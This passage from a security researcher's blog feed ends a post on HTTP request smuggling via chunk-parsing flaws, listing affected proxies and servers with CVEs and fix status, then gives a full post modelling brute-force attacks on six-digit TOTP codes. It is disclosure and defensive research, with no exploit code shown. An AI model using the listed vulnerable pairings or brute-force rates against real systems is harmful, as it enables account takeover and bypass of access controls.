<p>Such prefixing-based attacks can be adapted in a large variety of ways to perform devastating attacks against live clients with zero user interaction. As these exploitation techniques are not unique to the kinds of request smuggling vulnerabilities we have introduced in this article, I will not discuss them at length here. For a more comprehensive review of such attacks, I recommend the Portswigger Web Security Academy’s <a href="https://portswigger.net/web-security/request-smuggling/exploiting">article</a> on the topic.</p>

<h3 id="whos-vulnerable">Who’s vulnerable?</h3>
<p>Having developed these techniques, I set out to find vulnerable proxies and servers. In this endeavor, the amazing <a href="https://github.com/narfindustries/http-garden">HTTP Garden</a> project created by Ben Kallus and Prashant Anantharaman proved immensely valuable for quickly identifying chunk parsing inconsistencies across a wide range of HTTP implementations.</p>

<p>Running the black-box probes against a range of bug bounty targets also revealed several instances of real-world request smuggling vulnerabilities that had been overlooked for years. In fact, the EXT.TERM variant was entirely theoretical at the time I developed these probes – the only vulnerable front-end I discovered was a closed-source product identified using a probe against a live target.</p>

<p>Let’s take a look at the affected systems.</p>

<h4 id="termext-and-extterm-vulnerabilities">TERM.EXT and EXT.TERM vulnerabilities</h4>
<p>First, a brief reminder: In TERM.EXT and EXT.TERM vulnerabilities, the parsing discrepancy is introduced by a <code class="language-plaintext highlighter-rouge">\n</code> (or another sequence) in a chunk extension. Some parsers will interpret this as a line terminator and others will interpret it as part of the chunk extension, both of which are technically incorrect behaviors.</p>

<p>Interpreting newlines as line terminators turned out to be a <em>very</em> common flaw in both web servers and proxies. The limiting factor for exploitation is really normalization rendering the attack impossible in most cases. However, I did manage to discover three well-known vulnerable proxies that do not apply any line terminator normalization in the chunked body. Vulnerable servers are more common, since they (unlike proxies) cannot protect themselves by normalizing requests.</p>

<p>I’ve listed my discoveries in the table below. For more information about the resolution of each vulnerability, <strong>hover your mouse over the cell elements</strong>.</p>

<table>
  <colgroup>
    <col style="width: 15%" />
    <col style="width: 49%" />
    <col style="width: 41%" />
  </colgroup>
  <thead>
    <tr>
      <th></th>
      <th>TERM.EXT</th>
      <th>EXT.TERM</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <th>Proxies</th>
      <td>
        <span class="tooltip">
          1. Apache Traffic Server
          <span class="tooltiptext">Assigned CVE-2024-53868.</span>
        </span><br />
        <span class="tooltip">
          2. Google Classic Application Load Balancer
          <span class="tooltiptext">Awarded a $15,000 bounty by the Google VRP.</span>
        </span>
      </td>
      <td>
        <span class="tooltip">
          1. Imperva CDN
          <span class="tooltiptext">Awarded a $600 bounty.</span>
        </span>
      </td>
    </tr>
    <tr>
      <th>Servers</th>
        <td>
          <span class="tooltip">
            1. AIOHTTP
            <span class="tooltiptext">Assigned CVE-2024-52304.</span>
          </span><br />
          <span class="tooltip">
            2. fasthttp
            <span class="tooltiptext">Fixed in <a href="https://github.com/valyala/fasthttp/pull/1899" target="_blank"><code style="white-space: nowrap">PR #1899</code></a>.</span>
          </span><br />
          <span class="tooltip">
            3. Gunicorn
            <span class="tooltiptext">Known issue. Fix pending, see <a href="https://github.com/benoitc/gunicorn/pull/3327" target="_blank"><code style="white-space: nowrap">PR #3327</code></a>.</span>
          </span>
        </td>
        <td>
          <span class="tooltip">
            1. nginx
            <span class="tooltiptext">Decided not to fix.</span>
          </span><br />
          <span class="tooltip">
            2. Eclipse Jetty
            <span class="tooltiptext">Fixed in <a href="https://github.com/jetty/jetty.project/pull/12564" target="_blank"><code style="white-space: nowrap">PR #12564</code></a>.</span>
          </span><br />
          <span class="tooltip">
            3. Eclipse Grizzly
            <span class="tooltiptext">Fixed in <a href="https://github.com/eclipse-ee4j/grizzly/pull/2220" target="_blank"><code style="white-space: nowrap">PR #2220</code></a> (off by default).</span>
          </span><br />
          <span class="tooltip">
            4. netty
            <span class="tooltiptext">Fixed in <a href="https://github.com/netty/netty/pull/15611" target="_blank"><code style="white-space: nowrap">PR #15611</code></a>.</span>
          </span><br />
          <span class="tooltip">
            5. H2O
            <span class="tooltiptext">Fixed in <a href="https://github.com/h2o/picohttpparser/pull/82" target="_blank"><code style="white-space: nowrap">PR #82</code></a>.</span>
          </span><br />
          <span class="tooltip">
            6. Golang net/http
            <span class="tooltiptext">Assigned CVE-2025-22871 and awarded a $5,000 bounty by the Google VRP.</span>
          </span>
        </td>
    </tr>
  </tbody>
</table>

<p>Any combination of one of these proxies coupled with one of the servers in the same column would result in a vulnerability. As an example, here’s a TERM.EXT proof-of-concept attacking an AIOHTTP application behind a Google Cloud Classic Application Load Balancer.</p>

<script src="https://asciinema.org/a/tkF6XXyKTUVuZICZOesYBBbez.js" id="asciicast-tkF6XXyKTUVuZICZOesYBBbez" async="true"></script>

<p>The payload in the video smuggles a <code class="language-plaintext highlighter-rouge">POST /admin</code> request with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> header past the load balancer (which is configured to reject requests to <code class="language-plaintext highlighter-rouge">/admin</code>). After a few repeated requests, the response to the smuggled request is served.</p>

<h4 id="termspill-and-spillterm-vulnerabilities">TERM.SPILL and SPILL.TERM vulnerabilities</h4>
<p>For TERM.SPILL and SPILL.TERM vulnerabilities to arise, there must be a discrepancy in the line terminator parsing of the chunk body. Additionally, either the server or the proxy must accept oversized chunks.</p>

<p>Judging by the results of my own experimentation, TERM.SPILL and SPILL.TERM vulnerabilities are not quite as common as their TERM.EXT and EXT.TERM counterparts. Despite my efforts, I was unable to find a single proxy vulnerable to TERM.SPILL, which therefore remains a completely theoretical vulnerability for now. However, I did discover a few setups vulnerable to the SPILL.TERM variant.</p>

<table>
  <colgroup>
    <col style="width: 15%" />
    <col style="width: 30%" />
    <col style="width: 55%" />
  </colgroup>
  <thead>
    <tr>
      <th></th>
      <th>TERM.SPILL</th>
      <th>SPILL.TERM</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <th>Proxies</th>
      <td>
        <span class="tooltip">
          <i>None</i>
          <span class="tooltiptext">No TERM.SPILL-vulnerable proxies were found.</span>
        </span>
      </td>
      <td>
        <span class="tooltip">
          1. Google Classic Application Load Balancer
          <span class="tooltiptext">Assigned CVE-2025-4600 and awarded a $15,000 bounty by the Google VRP.</span>
        </span><br />
        <span class="tooltip">
          2. pound
          <span class="tooltiptext">Fixed in <a href="https://github.com/graygnuorg/pound/pull/43" target="_blank"><code style="white-space: nowrap">PR #43</code></a>.</span>
        </span>
      </td>
    </tr>
    <tr>
      <th>Servers</th>
        <td>
          <span class="tooltip">
            1. netty<br />
            2. Eclipse Grizzly<br />
            3. undertow
            <span class="tooltiptext">These servers accept spills. This is non-exploitable unless a vulnerable proxy exists.</span>
          </span><br />
        </td>
        <td>
          <span class="tooltip">
            1. uvicorn and hypercorn (<a href="https://github.com/python-hyper/h11" target="_blank">h11</a> dependency)
            <span class="tooltiptext">Assigned CVE-2025-43859.</span>
          </span><br />
          <span class="tooltip">
            2. Ktor
            <span class="tooltiptext">Assigned CVE-2025-29904 and awarded a $300 bounty by JetBrains.</span>
          </span><br />
          <span class="tooltip">
            3. Eclipse Jetty
            <span class="tooltiptext">Fixed in <a href="https://github.com/jetty/jetty.project/pull/12564" target="_blank"><code style="white-space: nowrap">PR #12564</code></a>.</span>
          </span><br />
          <span class="tooltip">
            4. uHTTPd
            <span class="tooltiptext">In discussion, see <a href="https://github.com/openwrt/uhttpd/pull/4" target="_blank"><code style="white-space: nowrap">PR #4</code></a>.</span>
          </span>
        </td>
    </tr>
  </tbody>
</table>

<p>Although categorized together, the parsing flaws in the table above are not exactly identical. Specifically, Ktor interpreted <code class="language-plaintext highlighter-rouge">\r</code> as a line terminator whereas h11 and uHTTPd accepted any 2-byte sequence. Jetty treated the CRLF as optional, effectively interpreting an empty string as a line terminator. On the proxy side, there is a nuance as well: pound did not allow <code class="language-plaintext highlighter-rouge">\r</code> in the spill. This means that pound-Ktor is notably <em>not</em> a vulnerable setup.</p>

<h3 id="closing-thoughts">Closing thoughts</h3>
<p>One thing that became clear to me during my discussions with various vendors and maintainers is that HTTP servers <em>really</em> care about robustness. Many were reluctant to adopt stricter parsing rules, fearing that they might break compatibility with non-compliant clients. Vulnerabilities like the ones described in this post reveal a fundamental disharmony between security and robustness: we simply cannot allow parsing leniencies without simultaneously opening the door to misinterpretations, at least a little bit.</p>

<p>While a great deal of attention has been given to request smuggling attacks based on the ambiguity of requests with both a <code class="language-plaintext highlighter-rouge">Content-Length</code> and <code class="language-plaintext highlighter-rouge">Transfer-Encoding: chunked</code> header, it seems to me that techniques based on chunked-body parsing flaws have largely been overlooked. I find it remarkable that the techniques we’ve explored in this article have remained undiscovered for so long, despite their relative simplicity. One cannot help but wonder: how many dangerous HTTP parser bugs are still out there, waiting to be found?</p>

<p><br /><br /></p>

<hr />

<p><br /><br /></p>

<p>If you have any comments or questions about this post, I’d love to hear them. Seriously. It would be great to know if anyone actually reads this. Feel free to reach out to me on X (<a href="https://x.com/__w4ke">@__wake</a>) or shoot me an email at <a href="mailto:jeppe.b.weikop@gmail.com">jeppe.b.weikop@gmail.com</a>.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">On the bruteforceability of time-based one-time passwords</title><link href="https://w4ke.info/2025/01/26/totp-brute.html" rel="alternate" type="text/html" title="On the bruteforceability of time-based one-time passwords" /><published>2025-01-26T00:00:00+00:00</published><updated>2025-01-26T00:00:00+00:00</updated><id>https://w4ke.info/2025/01/26/totp-brute</id><content type="html" xml:base="https://w4ke.info/2025/01/26/totp-brute.html"><![CDATA[<script defer="" src="https://cdn.jsdelivr.net/npm/plotly.js-dist@2.21.0/plotly.min.js"></script>

<script defer="" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>

<script defer="" src="https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/15.8.1/nouislider.min.js"></script>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/15.8.1/nouislider.css" />

<style>
#sliders {
  display: grid;
  grid-template-columns: 1fr 1fr;
  gap: 20px;
  width: 80%;
  margin: 20px auto;
}

.slider-container {
  display: flex;
  flex-direction: column;
  align-items: center;
  width: 100%;
}

.slider-label {
  margin-bottom: 5px;
  font-size: 15px;
}

.noUi-target {
  width: 90%;
  margin: 0 auto;
}
</style>

<p>It is hardly controversial to argue in 2025 that 6-digit time-based one-time passwords (TOTPs) are susceptible to brute-force attacks if not accompanied by appropriate rate-limiting countermeasures. When I recently found myself searching for a mathematical breakdown of this susceptibility, I was surprised to find that none seems to exist – only simplified descriptions that do not properly capture the subtleties of TOTPs. This lack of precision bugged me enough to do something about it.</p>

<p>What follows is my attempt to fill that gap. In this post, we’ll look into the mathematics of TOTP brute-force attacks and develop an accurate description, skipping the shortcuts. Finally, we will take some time to discuss the importance of the various TOTP configuration parameters.</p>

<h2 id="brief-introduction-to-totps">Brief introduction to TOTPs</h2>
<p>Before we dive into the math, let us first introduce TOTP and define some relevant terminology. If you’ve ever <del>been forced to enable</del> responsibly chosen to enable 2FA, you’re probably already familiar with the principle of TOTPs from apps like Google Authenticator. The basic idea is simple: the 2FA app generates a new 6-digit code every 30 seconds (each <em>“time step”</em>) using the current time and a shared secret usually provided in a QR code during 2FA setup. To prove your identity, you (the <em>“prover”</em>) submit the code and the server (the <em>“validator”</em>) independently generates the same code and verifies that they match. Codes do not need to be remembered, they can’t be used more than once, and all codes are equally likely to be generated. Lovely!</p>

<p>Since the current time is used in code generation, this scheme relies on the prover and validator staying reasonably time-synchronized. To account for potential clock drift and network latency, TOTP validators can choose to accept a number of the most recently expired codes (<em>“grace period codes”</em>) in addition to the correct code (the “<em>primary code”</em>). This optional grace period is intended to ensure that valid authentication attempts aren’t unfairly rejected due to minor synchronization issues.</p>

<p>There are then three configuration options of interest to our brute-force analysis purposes: the number of OTP digits \(D\), the time step duration \(L\), and the number of grace period codes \(\lambda\). We can therefore describe a TOTP validator’s configuration in completeness with the tuple \((D, L, \lambda)\).</p>

<p>Let us now take a look at these configuration parameters from an attacker’s perspective. First of all, we can conclude that the OTP space has a relatively small size of \(N = 10^D\). At any given time, \(1 + \lambda\) of these codes are acceptable to the validator, and during each time step, we can attempt a total of \(n = v \cdot L\) guesses, where \(v\) is our number of attempts per second.</p>

<h2 id="brute-force-mathematics">Brute-force mathematics</h2>
<p>Other authors (<a href="https://lukeplant.me.uk/blog/posts/6-digit-otp-for-two-factor-auth-is-brute-forceable-in-3-days/">Luke Plant, 2019</a> and <a href="https://pulsesecurity.co.nz/articles/totp-bruting">Michael Fincham, 2021</a>) have previously used a binomial distribution to model the probability of a successful brute-force attack against TOTP validators. This is a close approximation, but it suffers from certain inaccuracies. In this section, I will attempt to derive a more exact description.</p>

<p>First of all, I will argue that a <em>hypergeometric</em> distribution constitutes a better starting point than a binomial distribution. To see why, let us consult the <a href="https://en.wikipedia.org/wiki/Hypergeometric_distribution">Wikipedia article</a> on the subject:</p>

<blockquote>
  <p>(…) the hypergeometric distribution is a discrete probability distribution that describes the probability of  \(k\) successes (random draws for which the object drawn has a specified feature) in \(n\) draws, <strong>without</strong> replacement, from a finite population of size \(N\) that contains exactly \(K\) objects with that feature, wherein each draw is either a success or a failure. In contrast, the binomial distribution describes the probability of \(k\) successes in \(n\) draws <strong>with</strong> replacement.</p>
</blockquote>

<p>In this context, a <em>“random draw”</em> is a guess, the <em>“specified feature”</em> is the guess being a valid code, and <em>“replacement”</em> refers to whether or not we might submit the same guess multiple times. Clearly, any reasonable attacker would not repeat incorrect guesses within a single time step, as that would be guaranteed to fail. Let us therefore agree that the <em>without replacement</em> option makes more sense.</p>

<h3 id="the-simplest-case-lambda--0">The simplest case: \(\lambda = 0\)</h3>
<p>Now we’re ready to consider the simple case where \(\lambda = 0\). Within each individual time step, we’ve agreed that the number of correct guesses \(X\) follows a hypergeometric distribution. Since there is no grace period and thus only one valid code, we set \(K = 1\).</p>

\[X \sim Hypergeometric(N=10^D,\ K=1,\ n=vL)\]

<p>Consequently, its <a href="https://en.wikipedia.org/wiki/Probability_mass_function">PMF</a> is given by:</p>

\[Pr(X = k) = \frac{\binom{K}{k} \binom{N-K}{n-k}}{\binom{N}{n}}\]

<p>Remember, we only need to guess correctly <em>once</em>; anything other than \(X = 0\) correct guesses is considered a success. The probability of zero correct guesses (i.e. a <em>failure</em>) simplifies nicely:</p>

\[Pr(f) = Pr(X = 0) = \frac{\binom{K}{0} \binom{N-K}{n-0}}{\binom{N}{n}} = \frac{ \binom{N-K}{n}}{\binom{N}{n}} = \frac{ \binom{10^D - 1}{v L}}{\binom{10^D}{v L}} = \frac{10^D - v L}{10^D}\]

<p>\(Pr(f)\) represents the probability of failure during a <em>single</em> time step. Now, what happens when our brute-force attack spans multiple time steps? The probability of overall failure \(Pr(F)\) is equivalent to the probability of failing every individual time step. As such, we can describe the probability of failure after a \(T\)-second attack as the probability of failing \(T / L\) consecutive time steps.</p>

\[Pr(F) = {Pr(f)}^{T/L}\]

<p>Conversely, the probability of overall success must then be:</p>

\[Pr(S) = 1 - Pr(F)\]

<p>This is a complete description of the success probability in the simple case where \(\lambda = 0\). As we’ll see in the next section, the general case is a bit more convoluted.</p>

<h3 id="the-general-case">The general case</h3>
<p>It is tempting to conclude that in the general case where \(\lambda\) can take on a non-zero value, we can adjust our model simply by setting \(K = 1 + \lambda\). Unfortunately, it’s not quite that simple.</p>

<p>Consider what happens once we enter a new time step during our attack: a new primary code is generated, the previous one becomes a grace period code, and the oldest grace period code expires. At this point, <em>any code</em> could be valid, but some codes are less probable than others. Specifically, our failed attempts from the previous time step might match the new primary code, but they will certainly not be accepted as grace period codes. For this reason, we should not repeat guesses from the last \(\lambda\) time steps, as they are less likely to result in a success. By applying this intuitive optimization strategy, we can slightly improve our chances of success.</p>

<p>So how do we express this improvement mathematically? Instead of considering \(1 + \lambda\) codes to be valid simultaneously, we consider the probability of guessing each valid code individually. For each grace period code, we’ve effectively reduced the size of the OTP search space by \(n = v L\) guesses for each time step in which the code has been active. As such, we can express \(Pr(f)\) as a product of \(\lambda + 1\) differently parameterized hypergeometric probabilities. We introduce \(N_i = N - i v L\) to denote the size of the reduced search space for a code that has been active for \(i\) time steps.</p>

\[\begin{aligned}
Pr(f) &amp;=  Pr(X = 0 ; N_0) \cdot Pr(X = 0 ; N_1) \cdots Pr(X = 0 ; N_{\lambda}) \\
      &amp;= \prod_{i=0}^{\lambda}{Pr(X = 0 ; N_i)}
\end{aligned}\]

<p>Of course, this expression is only valid once the attack has been ongoing for at least \(\lambda\) time steps. Before that, we have not yet collected the necessary information by guessing incorrectly and we can therefore not reap the benefits of a reduced search space. For simplicity, we will ignore this <em>“slow start”</em> as its effect is negligible and needlessly notationally complicated.</p>

<p>As in the simple case, the probability of failure (and success) after \(T\) seconds can be expressed as:</p>

\[Pr(F) = {Pr(f)}^{T/L}\]

\[Pr(S) = 1 - Pr(F)\]

<p>At last! We have obtained an expression for the probability of a successful brute-force attack within \(T\) seconds with \(v\) attempts per second against a TOTP validator with configuration \((D, L, \lambda)\).</p>

<h2 id="lets-see-some-results">Let’s see some results</h2>
<p>Now that we have related the attack duration to the probability of success, let’s see what kind of results we get when we plug in some parameter values. I’ve included an interactive graph below for you to play with the various parameters and see how they affect the time required for a probable compromise.</p>

<div id="plot"></div>
<div id="sliders">
<div class="slider-container">
    <div class="slider-label">\(v\) (attempts per second): <span id="v-label">1</span></div>
    <div id="v-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(L\) (time step duration): <span id="L-label">30</span> seconds</div>
    <div id="L-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(\lambda\) (grace period parameter): <span id="lambda-label">1</span></div>
    <div id="lambda-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(D\) (number of digits): <span id="D-label">6</span></div>
    <div id="D-slider"></div>
</div>
</div>

<script>
let D = 6;
let v = 10;
let L = 30;
let lambda = 1;

function probByTime(T) {
    if (T == 0) return 0;

    let otpSpaceSize = 10 ** D;
    let vL = v * L;
    
    let result = 1;

    for (let i = 0; i <= lambda; i++) {
        let subtractable = i * vL;

        let Ni = otpSpaceSize - subtractable;

        if (Ni <= 0 || vL > Ni) {
            // if the entire space is covered, the probability of success is 100%
            return 1;
        }

        let subresult = 1 - (vL / Ni);

        result *= subresult;
    }

    return 1 - Math.pow(result, T / L);
}

function distribution() {
    const x = Array.from({length: 4*3*24+1}, (_, i) => i/4);
    const y = x.map(xVal => probByTime(60*60*xVal));
    return {x, y};
}

function updatePlot() {
    const data = distribution();
    const x = data.x;
    const y = data.y;

    const trace = {
        x: x,
        y: y,
        mode: 'lines',
        type: 'scatter'
    };

    const layout = {
        title: 'Brute-force success probability over time',
        xaxis: { title: 'Time (hours)', range: [0, 3*24+2] },
        yaxis: { title: 'Probability of success', range: [0, 1.1] }
    };

    Plotly.newPlot('plot', [trace], layout);
}

const vSlider = document.getElementById('v-slider');
const LSlider = document.getElementById('L-slider');
const lambdaSlider = document.getElementById('lambda-slider');
const DSlider = document.getElementById('D-slider');

function updateLabels() {
    document.getElementById('v-label').textContent = `${v}`;
    document.getElementById('L-label').textContent = `${L}`;
    document.getElementById('lambda-label').textContent = `${lambda}`;
    document.getElementById('D-label').textContent = `${D}`;
}

document.addEventListener("DOMContentLoaded", () => {
    noUiSlider.create(vSlider, {
        start: [10],
        range: { min: 1, max: 100 },
        step: 1
    });

    noUiSlider.create(LSlider, {
        start: [30],
        range: { min: 10, max: 15*60 },
        step: 5
    });

    noUiSlider.create(lambdaSlider, {
        start: [1],
        range: { min: 0, max: 8 },
        step: 1
    });

    noUiSlider.create(DSlider, {
        start: [6],
        range: { min: 4, max: 8 },
        step: 1
    });

    vSlider.noUiSlider.on('update', function(values) {
        v = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    LSlider.noUiSlider.on('update', function(values) {
        L = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    lambdaSlider.noUiSlider.on('update', function(values) {
        lambda = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    DSlider.noUiSlider.on('update', function(values) {
        D = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    updateLabels();
    updatePlot();
});

</script>

<p>So what conclusions can we draw from this mathematical venture of ours?</p>

<p>To my own personal dismay, the time step duration seems to carry very little weight. This unfortunately means that the simplified binomial model employed by other authors is almost indistinguishable from the one we developed in this article. In other words, our careful analysis turned out to be little more than computationally expensive pedantry. Well, at least now we know.</p>

<p>Unsurprisingly, the grace period parameter \(\lambda\) makes quite a significant difference to TOTP bruteforceability. It is my opinion that \(\lambda\) should generally be set to \(0\) in production systems, as it considerably weakens the security of TOTP authentication, and the synchronization issues it is supposed to address are presumably quite rare – unless the prover submits their code at the very last second, which I’d wager most users instinctively avoid anyway.</p>

<p>As we’d suspected, 6-digit TOTPs are indeed troublingly bruteforceable; a ~50% chance of success can be obtained in a matter of hours with even a modest request rate of 20-30 requests per second. And with specialized software like <a href="https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack">Turbo Intruder</a>, much higher rates can often be achieved.</p>

<p>Hopefully, these results are enough to convince any lingering skeptics that TOTP systems should always be accompanied by robust rate-limiting protections.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry></feed>